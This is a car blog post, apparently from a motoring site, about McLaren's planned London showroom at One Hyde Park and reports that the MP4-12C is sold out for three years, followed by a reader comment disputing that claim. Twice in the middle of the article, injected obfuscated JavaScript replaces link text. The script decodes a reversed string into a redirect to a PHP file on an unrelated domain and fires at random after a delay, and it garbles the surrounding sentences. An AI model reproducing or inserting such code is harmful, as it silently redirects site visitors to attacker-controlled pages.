The Macca may not be hitting the spot with the road testers as much as the Woking boys would have liked, or even suggested early on, but that will not stop people clambering over themselves to get a piece of the new mid sized Supercar on the scene.

To help facilitate the sale you need a showroom though… and trust McLaren to produce some of the most awesome showrooms known to man. Now, the above shot is not a real picture, rather a preview rendering of McLaren London’s dealer at, One Hyde Park. This will be the first of $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/20101022/” target=”_blank”>35 new dealers opening in $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/20101022/” target=”_blank”>19 countries around the world. However, if we are to believe Ian Gorsuch, there may be no cars to have sat in the showrooms… other than those of the modest folk who want to leave theirs in the showroom to show off to their mates.

Reports quoting McLaren’s regional director for Asia, the Middle East and Africa (the aforementioned Ian) has suggested that the new MP4-12C, is already sold out for the next three years! See… we told you the road testers reviews wouldn’t stop people.

Keep your eyes peeled across the Middle East for the first shots of the cars as they hit the streets – we want to see your pics!

  1. The Kensington showroom is small but beatifully proportioned, and the opening party was quite a blast!! FYI Every one of the showrooms will also get a classic F1 McLaren to display alongside the MP4 12Cs. Fingers crossed for Jame Hunt’s M23 in Dubai……

My understanding, as of Tuesday last week, is that with more than 1800 cars pre sold BEFORE the showrooms opened, and with a capacity to build up to 1000 before the end of 2011, any orders placed today will still be met by the middle of next year. Not sure where the three year delay story came from. But I suppose it depends on where they choose to allocate them.

Maybe the reviewers drove a different McLaren to the one I tried this week at Dunsfold, but mine was mind blowingly good. I suspect there’s a whole lot of blinkered “it can’t be as good as the old school manufacturers” snobbery going on. But time will tell…..
